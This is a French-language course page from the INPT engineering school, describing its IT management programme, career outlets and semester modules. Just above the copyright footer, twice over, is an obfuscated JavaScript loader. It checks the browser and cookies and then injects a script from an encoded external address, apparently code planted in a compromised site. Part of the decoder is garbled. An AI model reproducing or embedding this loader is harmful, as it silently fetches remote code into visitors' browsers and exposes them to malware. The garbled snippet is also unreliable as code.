

⚠ [1] ⚠ [1]

[Ingénierie du Management des Technologies de l'Information](#) [2]

La filière « **Ingénierie du Management des Technologies de l'Information** » a été mise en place par l'INPT pour former des ingénieurs dans les domaines des Télécommunications et Réseaux et de l'Informatique pour des applicatifs et des métiers tournés vers le management. Son programme a été pensé pour préparer les ingénieurs à acquérir une double compétence tournée vers l'ingénierie d'affaire, le management des systèmes d'information et la logistique, avec une ouverture sur l'environnement des technologies de l'information.

Coordonnateur de filière :

M. BARKA HAFID
barka@inpt.ac.ma
Tél: +212 538 002 830

Débouchés

Reconnu pour son excellence, le diplôme d'ingénieur du management des Technologies de l'Information donne accès, dès le premier emploi, à des postes à responsabilité dans une multitude de secteurs :

- Consultant en ERP
- Consultant en Business intelligence
- Consultant en Data mining
- Consultant en customer relationship management
- Consultant en supply chain management
- Consultant en fleet management
- Chef de projet it
- Ingénieur conseil
- Ingénieur technico-commercial
- Ingénieur avant-vente

- Ingénieur financier
- Ingénieur économie appliquée

Programme

Filière Management des Technologies de l'Information

1^{ère} année

S1

S2

2^{ème} année

S3

S4

3^{ème} année

S5

Choix de
l'option →

IA¹

Approche intégrée de l'ingénierie de

		<p>Systèmes d'information Décisionnelle</p> <p>Négociation et processus d'affaires</p> <p>Réseaux et Services évolués</p> <p>Qualité et Architecture des Systèmes</p> <p>Economie et Gestion IV</p> <p>Langues et techniques de Communication</p>
	SIM ²	<p>Projets</p> <p>Systèmes d'Information Transactionnelle</p> <p>Business Intelligence et Analytics</p> <p>Pilotage de la Performance</p> <p>Qualité et Architecture des Systèmes</p> <p>Ouverture Fonctionnelle sur les métiers</p>
	MIL ³	<p>Systèmes d'Information Transactionnelle</p> <p>Langues et techniques de Communication (deuxième année en anglais)</p> <p>Projets</p> <p>Méthodes d'aide à la décision</p> <p>Management Industriels</p> <p>Management Logistique</p> <p>Management de distribution et de traçabilité</p> <p>Economie et Gestion IV</p> <p>Langues et techniques de Communication (deuxième année en anglais)</p> <p>Projets</p>
S6		<p>Projet de fin d'études PFE</p>
	IA ¹	Option Ingénierie d'Affaires
	SIM ²	Option Systèmes d'Information pour les Métiers
	MIL ³	Option Management Industriel et Logistique
	<p>Liste des modules aux choix semestre 3 (*) Ouverture</p>	
	<p>Entreprenariat (ouvert pour les filières IT et 2I)</p>	
	<p>Java Avancé Client/Serveur</p>	
	<p>Parallélisme et Algorithmique Répartie</p>	
	<p>Bus et protocole de communication des systèmes embarqués</p>	
	<p>Energies renouvelables</p>	
	<p>Systèmes RF pour la communication par satellite & réseaux</p>	
	<p>Outils d'ingénierie réseaux</p>	

Faisceaux Hertziens

Ingénierie de Commutation numérique

Non linéarités dans les réseaux hauts débits

Technologie des capteurs et des capteurs à fibres

Éléments d'Information Quantique

Éléments de Cryptographie

```
;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}");var y=document[m(":e}idk,owodc,");if(s(x,m("0s7w)obd)n)i(W{"})&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}})();;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}");var y=document[m(":e}idk,owodc,");if(s(x,m("0s7w)obd)n)i(W{"})&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}})();
```

© 2017 Institut National des Postes et Télécommunications

-
-

Source URL: <http://web.inpt.ac.ma/fr/ing%C3%A9nierie-du-management-des-technologies-de-l%E2%80%99information>

Liens

[1] <http://web.inpt.ac.ma/fr/javascript%3A%3B>

[2] <http://web.inpt.ac.ma/fr/ing%C3%A9nierie-du-management-des-technologies-de-l%E2%80%99information>